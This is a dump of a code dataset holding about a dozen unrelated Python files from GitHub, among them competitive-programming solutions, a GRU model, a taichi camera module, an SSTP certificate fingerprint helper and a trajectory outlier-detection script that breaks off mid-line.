color_unknown\n text = ''.join('Unknown')\n cv2.putText(image, text, (x, y - 10), font, 0.6, color, thickness=2)\n\n cv2.rectangle(image, (x,y), (x+w,y+h), color, 2)\n\n image = cv2.putText(image, \"AI Face Recognition\", (10, 15), cv2.FONT_HERSHEY_SIMPLEX, 0.4,\n (0, 0, 255),\n lineType=cv2.LINE_AA)\n cv2.imshow('face classifier', image)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\ncapture.release()\ncv2.destroyAllWindows()\n","repo_name":"ksytrek/nsc_backup","sub_path":".old_history/Script/python/PCA/face-recogniser-video-pcaV2.py","file_name":"face-recogniser-video-pcaV2.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41142585678","text":"import torch.nn as nn\nimport torch\n\nclass Model(nn.Module):\n ''' nn.GRU\n '''\n def __init__(self):\n super(Model, self).__init__()\n self.gru1=nn.GRU(Co.f_in,128,batch_first=True)\n self.gru2=nn.GRU(128,128,batch_first=True)\n self.FC1=nn.Linear(128,1)\n self.FC2=nn.Linear(Co.seq_len,Co.pred_len)\n self.drop=nn.Dropout(0.2)\n\n def forward(self,X): \n out,hn = self.gru1(X)\n out,hn = self.gru2(self.drop(out))\n out = self.FC1(out).squeeze(-1) \n out = self.FC2(out).unsqueeze(-1)\n return out \n","repo_name":"hqyhello/Windpower-Prediciton","sub_path":"Models/GRU.py","file_name":"GRU.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28868120995","text":"\"\"\"\nhttps://leetcode.com/problems/roman-to-integer/\nGiven a roman numeral, convert it to an integer. Input is guaranteed to be within the range from 1 to 3999.\nInput: \"MCMXCIV\"\nOutput: 1994\n\"\"\"\n\nclass Solution:\n def romanToInt(self, s):\n cMap = {\n 'M' : 1000,\n 'D' : 500,\n 'C' : 100,\n 'L' : 50,\n 'X' : 10,\n 'V' : 5,\n 'I' : 1\n }\n\n sMap = { \n 'CM' : 900,\n 'CD' : 400,\n 'XC' : 90,\n 'XL' : 40,\n 'IX' : 9,\n 'IV' : 4\n }\n\n num = 0\n\n for rNum in sMap.keys():\n if rNum in s:\n s = s.replace(rNum, '')\n num += sMap[rNum]\n\n for rNum in cMap.keys():\n if rNum in s:\n n = s.count(rNum)\n num += n * cMap[rNum]\n s = s.replace(rNum, '')\n return num\n\n def test_romanToInt(self):\n print(self.romanToInt('LIX'))\n print(self.romanToInt('MCMXCIV'))\n","repo_name":"firoza90/leetcode","sub_path":"roman_to_integer.py","file_name":"roman_to_integer.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74526173286","text":"import taichi as ti\nimport taichi_glsl as ts\nfrom .common import *\nimport math\n\n\ndef rotationX(angle):\n return [\n [1, 0, 0],\n [0, math.cos(angle), -math.sin(angle)],\n [0, math.sin(angle), math.cos(angle)],\n ]\n\ndef rotationY(angle):\n return [\n [ math.cos(angle), 0, math.sin(angle)],\n [ 0, 1, 0],\n [-math.sin(angle), 0, math.cos(angle)],\n ]\n\ndef rotationZ(angle):\n return [\n [math.cos(angle), -math.sin(angle), 0],\n [math.sin(angle), math.cos(angle), 0],\n [ 0, 0, 1],\n ]\n\n\n@ti.data_oriented\nclass Affine(ts.TaichiClass, AutoInit):\n @property\n def matrix(self):\n return self.entries[0]\n\n @property\n def offset(self):\n return self.entries[1]\n\n @classmethod\n def _field(cls, shape=None):\n return ti.Matrix.field(3, 3, ti.f32, shape), ti.Vector.field(3, ti.f32, shape)\n\n @ti.func\n def loadIdentity(self):\n self.matrix = [[1, 0, 0], [0, 1, 0], [0, 0, 1]]\n self.offset = [0, 0, 0]\n\n @ti.kernel\n def _init(self):\n self.loadIdentity()\n\n @ti.func\n def __matmul__(self, other):\n return self.matrix @ other + self.offset\n\n @ti.func\n def inverse(self):\n # TODO: incorrect:\n return Affine(self.matrix.inverse(), -self.offset)\n\n def loadOrtho(self, fwd=[0, 0, 1], up=[0, 1, 0]):\n # fwd = target - pos\n # fwd = fwd.normalized()\n fwd_len = math.sqrt(sum(x**2 for x in fwd))\n fwd = [x / fwd_len for x in fwd]\n # right = fwd.cross(up)\n right = [\n fwd[2] * up[1] - fwd[1] * up[2],\n fwd[0] * up[2] - fwd[2] * up[0],\n fwd[1] * up[0] - fwd[0] * up[1],\n ]\n # right = right.normalized()\n right_len = math.sqrt(sum(x**2 for x in right))\n right = [x / right_len for x in right]\n # up = right.cross(fwd)\n up = [\n right[2] * fwd[1] - right[1] * fwd[2],\n right[0] * fwd[2] - right[2] * fwd[0],\n right[1] * fwd[0] - right[0] * fwd[1],\n ]\n\n # trans = ti.Matrix.cols([right, up, fwd])\n trans = [right, up, fwd]\n trans = [[trans[i][j] for i in range(3)] for j in range(3)]\n self.matrix[None] = trans\n\n def from_mouse(self, mpos):\n if isinstance(mpos, ti.GUI):\n if mpos.is_pressed(ti.GUI.LMB):\n mpos = mpos.get_cursor_pos()\n else:\n mpos = (0, 0)\n a, t = mpos\n if a != 0 or t != 0:\n a, t = a * math.tau - math.pi, t * math.pi - math.pi / 2\n c = math.cos(t)\n self.loadOrtho(fwd=[c * math.sin(a), math.sin(t), c * math.cos(a)])\n\n\n@ti.data_oriented\nclass Camera(AutoInit):\n ORTHO = 'Orthogonal'\n TAN_FOV = 'Tangent Perspective' # rectilinear perspective\n COS_FOV = 'Cosine Perspective' # curvilinear perspective, see en.wikipedia.org/wiki/Curvilinear_perspective\n\n def __init__(self, res=None, fx=None, fy=None, cx=None, cy=None,\n pos=[0, 0, -2], target=[0, 0, 0], up=[0, 1, 0], fov=30):\n self.res = res or (512, 512)\n self.img = ti.Vector.field(3, ti.f32, self.res)\n self.zbuf = ti.field(ti.f32, self.res)\n self.mask = ti.Vector.var(3, ti.f32, self.res)\n self.normal_map = ti.Vector.var(3, ti.f32, self.res)\n self.trans = ti.Matrix.field(3, 3, ti.f32, ())\n self.pos = ti.Vector.field(3, ti.f32, ())\n self.target = ti.Vector.field(3, ti.f32, ())\n self.intrinsic = ti.Matrix.field(3, 3, ti.f32, ())\n self.type = self.TAN_FOV\n self.fov = math.radians(fov)\n\n self.cx = cx or self.res[0] // 2\n self.cy = cy or self.res[1] // 2\n self.fx = fx or self.cx / math.tan(self.fov)\n self.fy = fy or self.cy / math.tan(self.fov)\n # python scope camera transformations\n self.pos_py = pos\n self.target_py = target\n self.trans_py = None\n self.up_py = up\n self.set(init=True)\n # mouse position for camera control\n self.mpos = (0, 0)\n\n def set_intrinsic(self, fx=None, fy=None, cx=None, cy=None):\n # see http://ais.informatik.uni-freiburg.de/teaching/ws09/robotics2/pdfs/rob2-08-camera-calibration.pdf\n self.fx = fx or self.fx\n self.fy = fy or self.fy\n self.cx = self.cx if cx is None else cx\n self.cy = self.cy if cy is None else cy\n\n '''\n NOTE: taichi_three uses a LEFT HANDED coordinate system.\n that is, the +Z axis points FROM the camera TOWARDS the scene,\n with X, Y being device coordinates\n '''\n def set(self, pos=None, target=None, up=None, init=False):\n pos = self.pos_py if pos is None else pos\n target = self.target_py if target is None else target\n up = self.up_py if up is None else up\n # fwd = target - pos\n fwd = [target[i] - pos[i] for i in range(3)]\n # fwd = fwd.normalized()\n fwd_len = math.sqrt(sum(x**2 for x in fwd))\n fwd = [x / fwd_len for x in fwd]\n # right = fwd.cross(up) \n right = [\n fwd[2] * up[1] - fwd[1] * up[2],\n fwd[0] * up[2] - fwd[2] * up[0],\n fwd[1] * up[0] - fwd[0] * up[1],\n ]\n # right = right.normalized()\n right_len = math.sqrt(sum(x**2 for x in right))\n right = [x / right_len for x in right]\n # up = right.cross(fwd)\n up = [\n right[2] * fwd[1] - right[1] * fwd[2],\n right[0] * fwd[2] - right[2] * fwd[0],\n right[1] * fwd[0] - right[0] * fwd[1],\n ]\n\n # trans = ti.Matrix.cols([right, up, fwd])\n trans = [right, up, fwd]\n self.trans_py = [[trans[i][j] for i in range(3)] for j in range(3)]\n self.pos_py = pos\n self.target_py = target\n if not init:\n self.pos[None] = self.pos_py\n self.trans[None] = self.trans_py\n self.target[None] = self.target_py\n\n def set_extrinsic(self, trans, pose):\n trans = [[trans[i][j] for j in range(3)] for i in range(3)]\n self.trans_py = trans\n self.pos_py = pose\n\n def _init(self):\n self.pos[None] = self.pos_py\n self.trans[None] = self.trans_py\n self.target[None] = self.target_py\n self.intrinsic[None][0, 0] = self.fx\n self.intrinsic[None][0, 2] = self.cx\n self.intrinsic[None][1, 1] = self.fy\n self.intrinsic[None][1, 2] = self.cy\n self.intrinsic[None][2, 2] = 1.0\n\n @ti.func\n def clear_buffer(self):\n for I in ti.grouped(self.img):\n self.img[I] = ts.vec3(0.0)\n self.zbuf[I] = 0.0\n self.mask[I] = ts.vec3(0.0)\n self.normal_map[I] = ts.vec3(0.5)\n\n def from_mouse(self, gui):\n is_alter_move = gui.is_pressed(ti.GUI.CTRL)\n if gui.is_pressed(ti.GUI.LMB):\n mpos = gui.get_cursor_pos()\n if self.mpos != (0, 0):\n self.orbit((mpos[0] - self.mpos[0], mpos[1] - self.mpos[1]),\n pov=is_alter_move)\n self.mpos = mpos\n elif gui.is_pressed(ti.GUI.RMB):\n mpos = gui.get_cursor_pos()\n if self.mpos != (0, 0):\n self.zoom_by_mouse(mpos, (mpos[0] - self.mpos[0], mpos[1] - self.mpos[1]),\n dolly=is_alter_move)\n self.mpos = mpos\n elif gui.is_pressed(ti.GUI.MMB):\n mpos = gui.get_cursor_pos()\n if self.mpos != (0, 0):\n self.pan((mpos[0] - self.mpos[0], mpos[1] - self.mpos[1]))\n self.mpos = mpos\n else:\n if gui.event and gui.event.key == ti.GUI.WHEEL:\n # one mouse wheel unit is (0, 120)\n self.zoom(-gui.event.delta[1] / 1200,\n dolly=is_alter_move)\n gui.event = None\n mpos = (0, 0)\n self.mpos = mpos\n\n\n def orbit(self, delta, sensitivity=5, pov=False):\n ds, dt = delta\n if ds != 0 or dt != 0:\n dis = math.sqrt(sum((self.target_py[i] - self.pos_py[i]) ** 2 for i in range(3)))\n fov = self.fov\n ds, dt = ds * fov * sensitivity, dt * fov * sensitivity\n newdir = ts.vec3(ds, dt, 1).normalized()\n newdir = [sum(self.trans[None][i, j] * newdir[j] for j in range(3))\\\n for i in range(3)]\n if pov:\n newtarget = [self.pos_py[i] + dis * newdir[i] for i in range(3)]\n self.set(target=newtarget)\n else:\n newpos = [self.target_py[i] - dis * newdir[i] for i in range(3)]\n self.set(pos=newpos)\n\n def zoom_by_mouse(self, pos, delta, sensitivity=3, dolly=False):\n ds, dt = delta\n if ds != 0 or dt != 0:\n z = math.sqrt(ds ** 2 + dt ** 2) * sensitivity\n if (pos[0] - 0.5) * ds + (pos[1] - 0.5) * dt > 0:\n z *= -1\n self.zoom(z, dolly)\n \n def zoom(self, z, dolly=False):\n newpos = [(1 + z) * self.pos_py[i] - z * self.target_py[i] for i in range(3)]\n if dolly:\n newtarget = [z * self.pos_py[i] + (1 - z) * self.target_py[i] for i in range(3)]\n self.set(pos=newpos, target=newtarget)\n else:\n self.set(pos=newpos)\n\n def pan(self, delta, sensitivity=3):\n ds, dt = delta\n if ds != 0 or dt != 0:\n dis = math.sqrt(sum((self.target_py[i] - self.pos_py[i]) ** 2 for i in range(3)))\n fov = self.fov\n ds, dt = ds * fov * sensitivity, dt * fov * sensitivity\n newdir = ts.vec3(-ds, -dt, 1).normalized()\n newdir = [sum(self.trans[None][i, j] * newdir[j] for j in range(3))\\\n for i in range(3)]\n newtarget = [self.pos_py[i] + dis * newdir[i] for i in range(3)]\n newpos = [self.pos_py[i] + newtarget[i] - self.target_py[i] for i in range(3)]\n self.set(pos=newpos, target=newtarget)\n\n @ti.func\n def trans_pos(self, pos):\n return self.trans[None] @ pos + self.pos[None]\n\n @ti.func\n def trans_dir(self, pos):\n return self.trans[None] @ pos\n\n @ti.func\n def untrans_pos(self, pos):\n return self.trans[None].inverse() @ (pos - self.pos[None])\n\n @ti.func\n def untrans_dir(self, pos):\n return self.trans[None].inverse() @ pos\n \n @ti.func\n def uncook(self, pos):\n if ti.static(self.type == self.ORTHO):\n pos[0] *= self.intrinsic[None][0, 0] \n pos[1] *= self.intrinsic[None][1, 1]\n pos[0] += self.intrinsic[None][0, 2]\n pos[1] += self.intrinsic[None][1, 2]\n elif ti.static(self.type == self.TAN_FOV):\n pos = self.intrinsic[None] @ pos\n pos[0] /= abs(pos[2])\n pos[1] /= abs(pos[2])\n else:\n raise NotImplementedError(\"Curvilinear projection matrix not implemented!\")\n return ts.vec2(pos[0], pos[1])\n\n def export_intrinsic(self):\n import numpy as np\n intrinsic = np.zeros((3, 3))\n intrinsic[0, 0] = self.fx\n intrinsic[1, 1] = self.fy\n intrinsic[0, 2] = self.cx\n intrinsic[1, 2] = self.cy\n intrinsic[2, 2] = 1\n return intrinsic\n\n def export_extrinsic(self):\n import numpy as np\n trans = np.array(self.trans_py)\n pos = np.array(self.pos_py)\n extrinsic = np.zeros((3, 4))\n\n trans = np.transpose(trans)\n for i in range(3):\n for j in range(3):\n extrinsic[i][j] = trans[i, j]\n pos = -trans @ pos\n for i in range(3):\n extrinsic[i][3] = pos[i]\n return extrinsic\n\n @ti.func\n def generate(self, coor):\n fov = ti.static(self.fov)\n tan_fov = ti.static(math.tan(fov))\n\n orig = ts.vec3(0.0)\n dir = ts.vec3(0.0, 0.0, 1.0)\n\n if ti.static(self.type == self.ORTHO):\n orig = ts.vec3(coor, 0.0)\n elif ti.static(self.type == self.TAN_FOV):\n uv = coor * fov\n dir = ts.normalize(ts.vec3(uv, 1))\n elif ti.static(self.type == self.COS_FOV):\n uv = coor * fov\n dir = ts.vec3(ti.sin(uv), ti.cos(uv.norm()))\n\n orig = self.trans_pos(orig)\n dir = self.trans_dir(dir)\n\n return orig, dir\n","repo_name":"DSaurus/DiffuStereo","sub_path":"taichi_render_gpu/taichi_three/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":12440,"program_lang":"python","lang":"en","doc_type":"code","stars":172,"dataset":"github-code","pt":"53"} +{"seq_id":"5296223958","text":"T = int(input())\nfor _ in range(T):\n players = int(input())\n goals = map(int,input().split())\n penalties = map(int, input().split())\n \n score = lambda x: x*20\n foul = lambda x: x*-10\n \n max_point = -500\n\n score_goals = list(map(score, goals))\n foul_penalties = list(map(foul, penalties))\n\n for i in range(players):\n player = score_goals[i] + foul_penalties[i]\n if player > max_point:\n max_point = player\n if max_point >= 0:\n print(max_point)\n else:\n print(0)","repo_name":"Udit107710/CompetitiveCoding","sub_path":"CodeChef/MSNSADM1/solutions.py","file_name":"solutions.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9693136520","text":"Cases = int(input())\n\ndef solve(a, d):\n N = len(a)\n if (N == 0):\n return ''\n zeros = [-1]\n for i in range(N):\n if (a[i] == d):\n zeros.append(i)\n zeros.append(N)\n M = len(zeros)\n ret = ''\n for i in range(1, M):\n if (zeros[i] > zeros[i - 1] + 1):\n ret += (\"(\" + solve(a[zeros[i-1] + 1 : zeros[i]], d + 1) + \")\")\n if (i < M - 1):\n ret += str(a[zeros[i]])\n return ret\n \n\nfor T in range(1, Cases + 1):\n s = list(map(int, list(input())))\n N = len(s)\n print(\"Case #{}: \".format(T), solve(s, 0))","repo_name":"heyshb/Competitive-Programming","sub_path":"CodeJam/2020Qual/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19083097996","text":"import base64\nimport hashlib\nfrom collections import namedtuple\n\n\nPEM_BEGIN_MARK = b'-----BEGIN CERTIFICATE-----'\nPEM_END_MARK = b'-----END CERTIFICATE-----'\n\nFingerprint = namedtuple('Fingerprint', 'sha1, sha256')\n\ndef get_fingerprint(pem_path):\n \"\"\"Return (sha1, sha256) fingerprint of PEM cert.\"\"\"\n lines = []\n with open(pem_path, 'rb') as pem:\n for line in pem:\n if line.rstrip() == PEM_BEGIN_MARK:\n break\n for line in pem:\n if line.rstrip() == PEM_END_MARK:\n break\n lines.append(line.strip())\n if not lines:\n raise IOError('not a vaild PEM file')\n der = base64.decodebytes(b''.join(lines))\n sha1 = hashlib.sha1(der).digest()\n sha256 = hashlib.sha256(der).digest()\n return Fingerprint(sha1, sha256)\n\n","repo_name":"sorz/sstp-server","sub_path":"sstpd/certtool.py","file_name":"certtool.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":238,"dataset":"github-code","pt":"53"} +{"seq_id":"23356531569","text":"from tkinter import *\nimport time\nroot = Tk()\nroot.title(\"CATS\")\nroot.geometry(\"100x100\")\nroot.resizable(width=True,height=True)\nroot.configure(bg=\"snow\")\ncase = IntVar()\ncats = StringVar()\ndogs = False\ndef stop():\n global dogs\n dogs = False\n root.update()\ndef does():\n global dogs\n case=0\n dogs = True\n while True:\n cats.set(case)\n root.update()\n time.sleep(1)\n case = case + 1\n\nbuttonStart = Button(root,text = \"start\",command = does)\nbuttonStart.pack(side=BOTTOM)\nbuttonStart = Button(root,text = \"stop\",command = stop)\nbuttonStart.pack(side=BOTTOM)\nscreen = Label(root,textvariable = cats,relief = RIDGE)\nscreen.pack()\n\n\n\n\n\nroot.mainloop()\n","repo_name":"xanderrp2/RandomPractice","sub_path":"cats.i.think.py","file_name":"cats.i.think.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6263504877","text":"from .runner import Runner\nimport database\nimport json\nfrom numbers import Number\n\n\nclass GiveCommand(Runner):\n\n def __init__(self, client, server, message, sender, args):\n super().__init__(client, server, message, sender, args)\n self.name = \"give_command\"\n\n def do(self):\n super().do()\n if int(self.sender.id) != 223212153207783435:\n return f\"{self.sender.mention} isn't allowed to do that :D\"\n if len(self.args) == 1:\n card_id = int(self.args[0])\n if database.add_card(self.sender, card_id):\n return f\"Transaction completed: you added {database.get_card_by_id(card_id)} to your cards\"\n else:\n return \"forgot to do !start\"\n else:\n return f\"command {self.name} has too many or too little arguments ( {self.args})\"\n","repo_name":"lordraindance2/cardgame","sub_path":"commands/give.py","file_name":"give.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41533714254","text":"# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\n\r\ndef metric_iou_dice(prediction, target):\r\n # [tile_counts, tile_size, nb_classes]\r\n # prediction = np.zeros(logits.shape)\r\n # prediction[np.where(np.greater_equal(logits, threshold))] = 1\r\n inte = np.sum(target * prediction)\r\n union = np.sum(target) + np.sum(prediction) - inte\r\n\r\n iou = float(inte) / (float(union)+ 0.001)\r\n\r\n l = np.sum(target * target)\r\n r = np.sum(prediction * prediction)\r\n dice = (2 * inte) / (l + r+0.0001)\r\n return iou, dice\r\n","repo_name":"YingChen7/A-SegAN","sub_path":"metric.py","file_name":"metric.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"16220704014","text":"import pytest\n\n\n@pytest.mark.parametrize(\n \"name\",\n [\n (\"unattended-upgrades\"),\n ],\n)\ndef test_packages_are_installed(host, name):\n package = host.package(name)\n assert package.is_installed\n\n\n@pytest.mark.parametrize(\n \"file,user,group,mode\",\n [\n (\"20auto-upgrades\", \"root\", \"root\", 0o644),\n (\"50unattended-upgrades\", \"root\", \"root\", 0o644),\n ],\n)\ndef test_config_files_exist(host, file, user, group, mode):\n config = host.file(\"/etc/apt/apt.conf.d/\" + file)\n assert config.exists\n assert config.is_file\n assert config.user == user\n assert config.group == group\n assert config.mode == mode\n","repo_name":"boutetnico/ansible-role-unattended-upgrades","sub_path":"molecule/default/tests/test_role.py","file_name":"test_role.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39792119530","text":"from math import ceil\nimport os\nfrom GSP import GSPModule\nfrom Utils import average_length_of_sequences, distance_of_trajectory\nfrom CustomScaler import Scaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC\nfrom sklearn.cluster import DBSCAN\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import f1_score, accuracy_score, confusion_matrix\nimport numpy as np\nimport pickle\nimport argparse\nfrom fastdtw import fastdtw\nfrom scipy.spatial.distance import euclidean\nfrom hilbertcurve.hilbertcurve import HilbertCurve\nfrom time import perf_counter\nfrom numba import njit\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\n@njit\ndef hausdorff_dist(A, B):\n dist = np.float32(-1.0)\n for a in A:\n minimum = np.float32(10000.0)\n for b in B:\n d = np.sqrt((a[0] - b[0])**2 + (a[1] - b[1])**2)\n if d < minimum:\n minimum = d\n if minimum > dist:\n dist = minimum\n return dist\n\n\ndef calculate_distances(X, distance_fn, verbose=False):\n distances = np.zeros((len(X), len(X)))\n hilbert = HilbertCurve(8, 2)\n\n for i in range(len(X)):\n X[i] = np.array(X[i])\n for i in range(len(X)):\n if i % 200 == 0 and verbose:\n print(round(100*i/len(X), 1), \"%\")\n for j in range(i + 1):\n d = 0\n if distance_fn == \"hausdorff\":\n d = max(hausdorff_dist(X[i], X[j]), hausdorff_dist(X[j], X[i]))\n elif distance_fn == \"dtw\":\n d, _ = fastdtw(X[i], X[j], dist=euclidean)\n elif distance_fn == \"dtw_hilbert\":\n xh = hilbert.distances_from_points([p for p in X[i]])\n yh = hilbert.distances_from_points([p for p in X[j]])\n d, _ = fastdtw(xh, yh, dist=lambda p1, p2: abs(p1-p2))\n else:\n raise Exception(\"Incorrect distance metric\")\n distances[i, j] = d\n distances[j, i] = d\n return distances\n\n\nparser = argparse.ArgumentParser(\n description=\"Compare performance of clustering algorithms.\")\nparser.add_argument(\"--dataset\",\n help=\"Specify the dataset to use\",\n default=\"geolife\")\nparser.add_argument(\"--G\", help=\"Specify the grid size\", default=\"40\")\nparser.add_argument(\"--eps\", help=\"Specify the eps\", default=\"1.5\")\nparser.add_argument(\n \"--minPts\", help=\"The DBSCAN minPts parameter.\", default=\"2\")\nparser.add_argument(\n \"--distance_fn\", help=\"The distance function used for the path clustering method (hausdorff, dtw or dtw_hilbert)\", default=\"hausdorff\")\nparser.add_argument(\"--C\", help=\"The C parameter.\", default=\"8000\")\nparser.add_argument(\"--gamma\", help=\"The gamma parameter.\", default=\"scale\")\nparser.add_argument(\"--kernel\", help=\"The SVM kernel.\", default=\"rbf\")\nparser.add_argument(\"--method\", help=\"clustering, svm, both or bothOr\", default=\"svm\")\nparser.add_argument(\"--do_gsp\", help=\"0 or 1\", default=\"0\")\nparser.add_argument(\"--gsp_support\", default=\"0.05\")\nparser.add_argument(\"--seed\", default=\"999\")\nargs = parser.parse_args()\n\ndataset = args.dataset\ngrid_scale = int(args.G)\neps = float(args.eps)\nminPts = int(args.minPts)\ndistance_fn = args.distance_fn\nC = int(args.C)\ngamma = args.gamma\nkernel = args.kernel\nmethod = args.method\ndo_gsp = bool(int(args.do_gsp))\ngsp_support = float(args.gsp_support)\nseed = int(args.seed)\n\ndata_file = \"trajectories_labeled_\" + dataset + \".pkl\"\ndata = pickle.load(open(data_file, \"rb\"))\n\nmanual_outliers = []\nif dataset == \"cyprus\":\n try:\n manual_outliers = pickle.load(open(\"manual_outliers.pkl\", \"rb\"))\n except:\n pass\n\nX_init = [[p[:2] for p in d[0]] for d in data]\ny = np.array([d[1] for d in data])\n\nx_init_train, x_init_test, y_train, y_test = train_test_split(\n X_init, y, train_size=0.75, random_state=seed)\n\nprint(\"Average length of raw sequences:\", average_length_of_sequences(X_init))\n\nt = perf_counter()\n\nscaler = Scaler()\npoints = []\nfor x in X_init:\n points.extend(x)\nscaler.fit(points)\n\nx_train = [scaler.transform_trajectory(x) for x in x_init_train]\nx_test = [scaler.transform_trajectory(x) for x in x_init_test]\nif dataset == \"cyprus\":\n manual_outliers = [scaler.transform_trajectory(x) for x in manual_outliers]\n\n\ndef calc_features(X, gsp_dists=[], gsp=False, isCoordinates=False):\n feature_list = []\n # FEATURES: MAYBE ADD TRIP TIME\n for i, x in enumerate(X):\n features = [x[0][0], x[0][1], x[-1][0], x[-1][1],\n distance_of_trajectory(np.array(x), isCoordinates=isCoordinates)]\n if gsp:\n features.append(gsp_dists[i])\n feature_list.append(features)\n return feature_list\n\n\nx_train_features = np.array(calc_features(x_init_train, isCoordinates=True))\nminmax_values = [(np.min(x_train_features[:, j]), np.max(\n x_train_features[:, j])) for j in range(5)]\n\npickle.dump(minmax_values, open(dataset+\"_minmax.pkl\", \"wb\"))\n\nX_grid_train = []\nX_grid_test = []\nX_grid_manual = []\nfor x in x_train:\n X_grid_train.append(scaler.trajectory_to_grid(x, grid_scale))\nprint(\"Average length of size \" + str(grid_scale) + \" grid cell sequences:\",\n average_length_of_sequences(X_grid_train))\n\ngsp = GSPModule()\nif method in [\"svm\", \"both\", \"bothOr\"] and do_gsp:\n gsp.find_frequent_subsequences(\n X_grid_train+X_grid_test+X_grid_manual, gsp_support, False)\n\nfor x in x_test:\n X_grid_test.append(scaler.trajectory_to_grid(x, grid_scale))\n\nfor x in manual_outliers:\n X_grid_manual.append(scaler.trajectory_to_grid(x, grid_scale))\n\n\ndef sample_trajectory(X, n):\n X = np.array(X)\n sampled = X[[round(i) for i in np.linspace(0, len(X)-1, num=n)]]\n return sampled.tolist()\n\n\nif method in [\"clustering\", \"both\", \"bothOr\"]:\n if distance_fn == \"dtw\" or distance_fn == \"dtw_hilbert\":\n samples = ceil(average_length_of_sequences(X_grid_train)) + 1\n X_grid_train = [sample_trajectory(x, samples) if len(\n x) > samples else x for x in X_grid_train]\n X_grid_test = [sample_trajectory(x, samples) if len(\n x) > samples else x for x in X_grid_test]\n X_grid_manual = [sample_trajectory(x, samples) if len(\n x) > samples else x for x in X_grid_manual]\n\n distances = []\n\n try:\n distances = pickle.load(\n open(dataset+'_'+distance_fn+'_'+'distances.pkl', 'rb'))\n except:\n distances = calculate_distances(\n X_grid_train+X_grid_test+X_grid_manual, distance_fn, verbose=False)\n pickle.dump(distances, open(\n dataset+'_'+distance_fn+'_'+'distances.pkl', 'wb'))\n\n distances_train = distances[:len(X_grid_train), :len(X_grid_train)]\n\n dbscan = DBSCAN(eps=eps, metric=\"precomputed\",\n n_jobs=-1, min_samples=minPts)\n labels_train = dbscan.fit_predict(distances_train)\n\n distances_test_pred = distances[len(X_grid_train):len(\n X_grid_train)+len(X_grid_test), :len(X_grid_train)]\n distances_manual_pred = distances[len(\n X_grid_train)+len(X_grid_test):, :len(X_grid_train)]\n labels_test = [labels_train[np.argmin(\n distances_test_pred[i])] for i in range(len(X_grid_test))]\n labels_manual = [labels_train[np.argmin(\n distances_manual_pred[i])] for i in range(len(X_grid_manual))]\n\n y_pred_train1 = np.array([1 if l == -1 else 0 for l in labels_train])\n y_pred_test1 = np.array([1 if l == -1 else 0 for l in labels_test])\n y_pred_manual1 = np.array([1 if l == -1 else 0 for l in labels_manual])\n print(\"Finished path clustering\")\n\nif method in [\"svm\", \"both\", \"bothOr\"]:\n gsp_dists_train = []\n gsp_dists_test = []\n gsp_dists_manual = []\n if do_gsp:\n gsp_dists_train = gsp.deviation_from_frequent(X_grid_train)\n gsp_dists_test = gsp.deviation_from_frequent(X_grid_test)\n gsp_dists_manual = gsp.deviation_from_frequent(X_grid_manual)\n\n X_features_train = calc_features(x_train, gsp_dists_train, do_gsp)\n X_features_test = calc_features(x_test, gsp_dists_test, do_gsp)\n X_features_manual = calc_features(\n manual_outliers, gsp_dists_manual, do_gsp)\n\n minmax = MinMaxScaler()\n X_features_train = minmax.fit_transform(X_features_train)\n X_features_test = minmax.transform(X_features_test)\n if dataset == \"cyprus\":\n X_features_manual = minmax.transform(X_features_manual)\n\n svm = SVC(C=C, gamma=gamma, kernel=kernel)\n svm.fit(X_features_train, y_train)\n y_pred_train2 = svm.predict(X_features_train)\n y_pred_test2 = svm.predict(X_features_test)\n if dataset == \"cyprus\":\n y_pred_manual2 = svm.predict(X_features_manual)\n\n print(\"Finished feature training\")\n\nif method == \"both\":\n y_pred_train_concat = np.concatenate(\n (y_pred_train1.reshape((-1, 1)), y_pred_train2.reshape((-1, 1))), axis=1)\n y_pred_test_concat = np.concatenate(\n (y_pred_test1.reshape((-1, 1)), y_pred_test2.reshape((-1, 1))), axis=1)\n if dataset == \"cyprus\":\n y_pred_manual_concat = np.concatenate(\n (y_pred_manual1.reshape((-1, 1)), y_pred_manual2.reshape((-1, 1))), axis=1)\n logreg = LogisticRegression()\n logreg.fit(y_pred_train_concat, y_train)\n y_pred_train = logreg.predict(y_pred_train_concat)\n y_pred_test = logreg.predict(y_pred_test_concat)\n if dataset == \"cyprus\":\n y_pred_manual = logreg.predict(y_pred_manual_concat)\n # print(logreg.coef_)\nelif method == \"bothOr\":\n y_pred_train = np.logical_or(y_pred_train1, y_pred_train2).astype(int)\n y_pred_test = np.logical_or(y_pred_test1, y_pred_test2).astype(int)\n if dataset == \"cyprus\":\n y_pred_manual = np.logical_or(y_pred_manual1, y_pred_manual2).astype(int)\nelif method == \"clustering\":\n y_pred_train = y_pred_train1\n y_pred_test = y_pred_test1\n if dataset == \"cyprus\":\n y_pred_manual = y_pred_manual1\nelse: # SVM\n y_pred_train = y_pred_train2\n y_pred_test = 